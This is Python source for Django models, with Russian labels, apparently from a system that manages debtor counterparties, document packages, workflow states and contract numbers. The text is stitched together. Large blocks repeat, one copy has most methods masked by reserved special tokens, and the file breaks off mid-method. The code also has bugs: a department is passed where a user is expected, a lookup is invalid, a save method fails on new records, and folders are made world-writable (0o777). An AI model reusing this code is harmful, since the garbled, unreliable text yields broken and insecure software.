tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents', related_query_name='contragent', null=
True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True, editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.0)
tax_count = models.FloatField('Госпошлина', default=0.0)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия', null=
True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,
blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(), str(self
.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return user.department in depts or user in users
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
self.save()
class Meta:
verbose_name_plural = 'Пакеты документов'
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel', related_name=
'document_type')
states = models.ForeignKey('State', related_name='states', on_delete=
models.CASCADE, blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate', on_delete=models.
CASCADE, blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = 'Шаблоны файлов'
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта', max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name=
'normatives', verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = 'Категории нормативов'
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива', null=
True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива', null
=True, blank=True)
value = models.FloatField('Значение норматива (год.)', null=True, blank
=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,' +
f" действующий с {self.since_date.strftime('%d.%m.%Y')}" +
f" по {self.up_to_date.strftime('%d.%m.%Y')}")
class Meta:
verbose_name_plural = 'Нормативы'
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{self.date_field.year}/ТКО/01'
class Meta:
verbose_name_plural = 'Сгенерированые номера договоров'
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='', max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool=False, exist_number: str=''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = 'Номера договоров'
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = 'Номера документов'
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Города'
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента', choices=
KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel', verbose_name=
'Тип документа', on_delete=models.CASCADE)
def __str__(self):
return (
f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'
)
class Meta:
verbose_name_plural = 'Шаблоны документов'
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255, null=True,
blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = 'Типы документов'
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы', related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние', default=False
)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return user.is_superuser or user.is_staff or self._is_dept_permitted(
user.department)
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние', blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние', blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if not res.active_package else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.filter(current_user__contain=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk, current_user__contain=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [(c.department == user.department) for c in
contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and user in c.current_user:
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user
) and user in contragent.current_user:
return contragent
return contragent
except Contragent.DoesNotExist:
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Contragent(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def check_and_create_parent_folder(self):
if not os.path.isdir(os.path.join(settings.MEDIA_ROOT, KLASS_TYPES[
self.klass][1])):
os.mkdir(os.path.join(settings.MEDIA_ROOT, KLASS_TYPES[self.
klass][1]), mode=511)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_active_package(self):
res = DocumentsPackage.get_active_package(self)
return res
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
verbose_name_plural = 'Контрагенты'
class SignUser(models.Model):
name = models.CharField('ФИО отвественного лица', max_length=255)
document = models.IntegerField('Документ основания', choices=DOC_TYPE,
default=0)
position = models.IntegerField('Должность', choices=POST_TYPE, default=0)
doc_number = models.CharField('Номер документа', max_length=255)
doc_date = models.DateField('Дата начала действия документа')
address = models.CharField('Адресс', max_length=255)
city = models.ForeignKey('CityModel', on_delete=models.CASCADE, blank=
True, null=True)
tel_number = models.CharField('Телефон', max_length=255, default='')
sign = models.ImageField('Подпись', upload_to='signs/', blank=True,
null=True)
def __str__(self):
return f'{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}'
def save(self, *args, **kwargs):
instance = SignUser.objects.get(id=self.id)
if self.sign != instance.sign and instance.sign:
if os.path.exists(instance.sign.url):
os.remove(instance.sign.url)
super().save(*args, **kwargs)
class Meta:
verbose_name_plural = 'Отвественные лица с правом подписи'
class Commentary(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.
CASCADE, blank=True, null=True)
commentary_text = models.TextField('Комментарий', blank=True, null=True)
creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания файла', blank=True,
null=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
file_type = models.ForeignKey('DocumentTypeModel', on_delete=models.CASCADE
)
def delete(self, using=None, keep_parents=False):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
return super().delete(using=using, keep_parents=keep_parents)
class Meta:
abstract = True
class SingleFile(AbstractFileModel):
def __str__(self):
return str(self.file_type)
class Meta:
verbose_name_plural = 'Единичные файлы'
class PackFile(AbstractFileModel):
unique_number = models.ForeignKey('SyncUniqueNumber', on_delete=models.
CASCADE, null=True, blank=True)
class Meta:
abstract = False
verbose_name_plural = 'Фаилы набора'
def initialize_folder(self, path: str):
if self.file_type:
tmp_str_path = plur_form(self.file_type.doc_type)
if not os.path.isdir(f'{path}/{tmp_str_path}/'):
os.makedirs(f'{path}/{tmp_str_path}/')
else:
raise AttributeError()
def get_files_path(self, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
self.initialize_folder(tmp_path)
return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
<|reserved_special_token_0|>
class OtherFile(AbstractFileModel):
file_obj = models.FileField('Произвольные файлы', upload_to=
other_files_directory_path, max_length=500)
commentary = GenericRelation(Commentary, related_query_name='file')
class Meta:
verbose_name_plural = 'Прочие файлы'
class ActExam(models.Model):
FOLDER = 'Акт осмотра/'
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
@classmethod
def initialize_folder(cls, path: str):
tmp_path = f'{path}/{cls.FOLDER}'
if not os.path.isdir(tmp_path):
os.makedirs(tmp_path)
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents', related_query_name='contragent', null=
True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True, editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.0)
tax_count = models.FloatField('Госпошлина', default=0.0)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия', null=
True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,
blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(), str(self
.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return user.department in depts or user in users
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
self.save()
class Meta:
verbose_name_plural = 'Пакеты документов'
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel', related_name=
'document_type')
states = models.ForeignKey('State', related_name='states', on_delete=
models.CASCADE, blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate', on_delete=models.
CASCADE, blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = 'Шаблоны файлов'
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта', max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name=
'normatives', verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = 'Категории нормативов'
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива', null=
True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива', null
=True, blank=True)
value = models.FloatField('Значение норматива (год.)', null=True, blank
=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,' +
f" действующий с {self.since_date.strftime('%d.%m.%Y')}" +
f" по {self.up_to_date.strftime('%d.%m.%Y')}")
class Meta:
verbose_name_plural = 'Нормативы'
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{self.date_field.year}/ТКО/01'
class Meta:
verbose_name_plural = 'Сгенерированые номера договоров'
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='', max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool=False, exist_number: str=''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = 'Номера договоров'
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = 'Номера документов'
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Города'
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента', choices=
KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel', verbose_name=
'Тип документа', on_delete=models.CASCADE)
def __str__(self):
return (
f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'
)
class Meta:
verbose_name_plural = 'Шаблоны документов'
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255, null=True,
blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = 'Типы документов'
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы', related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние', default=False
)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return user.is_superuser or user.is_staff or self._is_dept_permitted(
user.department)
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние', blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние', blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if not res.active_package else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.filter(current_user__contain=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk, current_user__contain=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [(c.department == user.department) for c in
contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and user in c.current_user:
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user
) and user in contragent.current_user:
return contragent
return contragent
except Contragent.DoesNotExist:
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import datetime
import os
import uuid
from abc import ABC, abstractmethod
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.contenttypes.fields import (GenericForeignKey,
GenericRelation)
from django.contrib.contenttypes.models import ContentType
from django.db import models
from bluebird.templatetags.template_extra_filters import (plur_form,
proper_last_name)
from bluebird.tasks import calc_create_gen_async
from django_q.tasks import async_task
from .snippets import str_add_app, KLASS_TYPES, DOC_TYPE
NORM_TYPE = [
(0, '1 м2 общей площади'),
(1, '1 место'),
(2, '1 человек'),
]
POST_TYPE = [
(0, 'Клиент-менеджер'),
(1, 'Старший менеджер по работе с ЮЛ'),
(2, 'Менеджер'),
]
class Adress(models.Model):
state = models.CharField(verbose_name="Область", max_length=255)
city = models.CharField(verbose_name="Город", max_length=255)
street = models.CharField(verbose_name="Улица", max_length=255)
block = models.CharField(verbose_name="Номер дома", max_length=10)
class ContragentClass(models.Model):
name = models.CharField('Наименование', max_length=255)
class Contragent(models.Model):
"""
Класс Контрагента.
"""
# klass = models.ForeignKey(ContragentClass, on_delete=models.CASCADE)
klass = models.IntegerField(choices=KLASS_TYPES, default=0)
excell_name = models.CharField('Наименование контрагента (из Excell)',
max_length=255)
dadata_name = models.CharField('Наименование контрагента (из Dadata)',
max_length=255, blank=True, null=True)
debt = models.FloatField('Сумма задолжности', default=0.00)
debt_period = models.IntegerField('Количество неоплаченных периодов, мес.',
blank=True, null=True)
inn = models.BigIntegerField('ИНН контрагента', blank=True, null=True)
ogrn = models.BigIntegerField('ОГРН контрагента', blank=True, null=True)
kpp = models.BigIntegerField('КПП контрагента', blank=True, null=True)
rs = models.CharField('Р/с', max_length=255, blank=True, null=True)
ks = models.CharField('К/с', max_length=255, blank=True, null=True)
bank = models.CharField('Наименование банка', max_length=255, blank=True,
null=True)
bik = models.CharField('БИК', max_length=255, blank=True, null=True)
opf = models.CharField('ОПФ', max_length=255, blank=True, null=True)
director_status = models.CharField('Директор (физ. лицо либо юр. лицо)',
max_length=255, blank=True, null=True)
director_name = models.CharField('Имя либо иное наименование директора',
max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания контрагента (юл)',
blank=True, null=True)
is_func = models.BooleanField('Признак активности контрагента',
default=True)
okved = models.CharField('ОКВЭД',
max_length=255, blank=True, null=True)
# TODO REWORK THIS AREA
physical_address = models.CharField('Физический адресс',
max_length=255)
legal_address = models.CharField('Юридический адресс',
max_length=255, blank=True, null=True)
# END OF REWORK
norm_value = models.ForeignKey('NormativeCategory',
related_name='normatives',
on_delete=models.CASCADE,
blank=True, null=True)
stat_value = models.FloatField('Показатель', blank=True, null=True)
contract_accept_date = models.DateField(
'Дата начала оказания услуг',
default=datetime.date.fromisoformat('2018-07-01'),
blank=True, null=True
)
current_date = models.DateField('Конечная дата оказания услуг',
default=datetime.date.today, blank=True,
null=True)
number_contract = models.OneToOneField('ContractNumberClass',
on_delete=models.CASCADE,
max_length=255,
blank=True, null=True)
current_contract_date = models.DateField('Дата заключения договора',
blank=True, null=True)
signed_user = models.ForeignKey('SignUser', blank=True, null=True,
on_delete=models.CASCADE,
related_name='signed')
platform = models.IntegerField('№ площадки',
blank=True, null=True)
judge_link = models.CharField(verbose_name="", max_length=255,
blank=True, null=True)
fss_link = models.CharField(verbose_name="", max_length=255,
blank=True, null=True)
personal_number = models.CharField(verbose_name="Лицевой счет",
max_length=255, blank=True, null=True)
passport_number = models.CharField(verbose_name="Номер паспорта",
max_length=15, blank=True, null=True)
passport_date = models.DateField(verbose_name="Дата выдачи пасспорта",
blank=True, null=True)
passport_origin = models.CharField(verbose_name="Кем выдан пасспорт",
max_length=15, blank=True, null=True)
snils = models.CharField(verbose_name="СНИЛС",
max_length=15, blank=True, null=True)
def create_package_and_folder(self):
self.check_and_create_parent_folder()
if not os.path.isdir(self.get_str_as_path()):
os.mkdir(self.get_str_as_path(), mode=0o777)
def check_and_create_parent_folder(self):
if not os.path.isdir(os.path.join(settings.MEDIA_ROOT,
KLASS_TYPES[self.klass][1])):
os.mkdir(os.path.join(settings.MEDIA_ROOT,
KLASS_TYPES[self.klass][1]), mode=0o777)
def get_str_as_path(self):
return os.path.join(os.path.join(settings.MEDIA_ROOT,
KLASS_TYPES[self.klass][1]),
f'{self.pk} {self.excell_name}')
@property
def current_user(self):
package = self.get_active_package()
if package:
res = [user for user in package.package_users.all(
) if package.package_state.is_permitted(user)]
return res
return None
@current_user.setter
def current_user(self, user):
package = self.get_active_package()
if package and not package.is_user_in_package(user, True):
package.package_users.add(user)
package.save()
@property
def active_package(self):
return self.get_active_package()
def get_all_packages(self):
return DocumentsPackage.objects.filter(contragent=self.pk) or None
def get_active_package(self):
res = DocumentsPackage.get_active_package(self)
return res
def reset_debt(self):
self.debt = 0
self.debt_period = 0
self.save()
def __str__(self):
return f'{self.excell_name}'
class Meta:
verbose_name_plural = "Контрагенты"
class SignUser(models.Model):
name = models.CharField('ФИО отвественного лица', max_length=255)
document = models.IntegerField('Документ основания', choices=DOC_TYPE,
default=0)
position = models.IntegerField('Должность', choices=POST_TYPE,
default=0)
doc_number = models.CharField('Номер документа', max_length=255)
doc_date = models.DateField('Дата начала действия документа')
address = models.CharField('Адресс', max_length=255)
city = models.ForeignKey('CityModel', on_delete=models.CASCADE,
blank=True, null=True)
tel_number = models.CharField('Телефон', max_length=255, default='')
sign = models.ImageField('Подпись', upload_to='signs/',
blank=True, null=True)
def __str__(self):
# return self.name
